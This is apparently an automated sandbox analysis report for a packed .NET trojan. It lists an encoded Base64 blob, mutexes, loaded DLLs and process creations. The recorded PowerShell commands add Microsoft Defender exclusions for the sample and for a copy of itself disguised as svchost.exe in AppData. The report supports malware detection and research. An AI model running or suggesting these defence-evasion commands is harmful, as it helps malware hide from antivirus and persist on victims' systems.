              Source: svchost.exe.0.dr, Abacate.csBase64 encoded string: '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
              Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe.3a0ddd0.0.raw.unpack, Abacate.csBase64 encoded string: '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
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@20/27@5/2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile created: C:\Users\user\AppData\Local\svchost.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
              Source: C:\Users\user\AppData\Local\svchost.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1436
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7632:64:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeMutant created: \Sessions\1\BaseNamedObjects\Qvuhc4l9Oqg1bAmX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa0ex2e0.y0l.ps1Jump to behavior
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeReversingLabs: Detection: 50%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Local\svchost.exe "C:\Users\user\AppData\Local\svchost.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\svchost.exe "C:\Users\user\AppData\Local\svchost.exe"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1436 -ip 1436
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 2424
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1436 -ip 1436
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 2424
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
